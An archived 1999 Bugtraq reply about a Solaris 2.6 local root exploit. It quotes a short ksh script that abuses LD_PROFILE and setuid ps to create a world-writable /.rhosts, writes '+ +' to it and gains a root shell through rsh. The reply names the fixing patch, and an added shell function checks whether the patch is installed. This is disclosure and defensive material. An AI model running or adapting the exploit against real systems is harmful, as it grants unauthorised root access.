Bugtraq mailing list archives

Re: LD_PROFILE local root exploit for solaris 2.6


From: darren.moffat () SUNUK UK SUN COM (Darren Moffat - Solaris Sustaining Engineering)
Date: Fri, 24 Sep 1999 10:00:46 +0100


works on solaris 2.6 sparc anyway...

#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i

This was bug# 4150646/1241843 which is fixed in patch 105490-05 (or higher),
which was released over 1 year ago (Sep/10/98)!

Patch 105490-07 is in the current recommended patch set for Solaris 2.6,
so it is publicly available.

I strongly recommend that people apply the latest recommended and security
patch sets when testing out security exploits.  That way you won't send
out information about exploits which have been long fixed and needlessly
panic people.

--
Darren J Moffat
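
The patch-level check the reply calls for, as an added example that is not part of the original post or of any Sun tooling: it reads `showrev -p` output and reports whether patch 105490 is at revision 05 or later. The function names, the assumed "Patch: <id>-<rev> ..." line format, and the sample lines (including the 100000-01 entry and PKGNAME) are constructed for illustration.

```shell
#!/bin/sh
# Added example: decide from `showrev -p` output whether patch 105490 is at
# revision 05 or later, the level the post names as the fix.
# Assumes lines of the form "Patch: <id>-<rev> ..." (assumed format).

PATCH_ID=105490   # patch number given in the post
MIN_REV=5         # first fixed revision given in the post (105490-05)

# Read showrev -p output on stdin; print the highest installed revision
# of $PATCH_ID as a plain number, or nothing if the patch is not listed.
highest_rev() {
    best=""
    while read -r tag id rest; do
        [ "$tag" = "Patch:" ] || continue
        case "$id" in
            "$PATCH_ID"-[0-9][0-9]) ;;   # exact id, two-digit revision
            *) continue ;;
        esac
        rev=${id#*-}
        rev=${rev#0}                     # "05" -> "5" for numeric compare
        if [ -z "$best" ] || [ "$rev" -gt "$best" ]; then
            best=$rev
        fi
    done
    echo "$best"
}

# Print "fixed", "outdated" or "missing" for the showrev -p output on stdin.
ld_profile_patch_status() {
    rev=$(highest_rev)
    if [ -z "$rev" ]; then
        echo "missing"
    elif [ "$rev" -ge "$MIN_REV" ]; then
        echo "fixed"
    else
        echo "outdated"
    fi
}

# Constructed sample input. On a real host: showrev -p | ld_profile_patch_status
SAMPLE='Patch: 100000-01 Obsoletes:  Packages: PKGNAME
Patch: 105490-04 Obsoletes:  Packages: PKGNAME
Patch: 105490-07 Obsoletes:  Packages: PKGNAME'
printf '%s\n' "$SAMPLE" | ld_profile_patch_status
```

A host that reports "outdated" or "missing" is still at the patch level the quoted script was written against.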


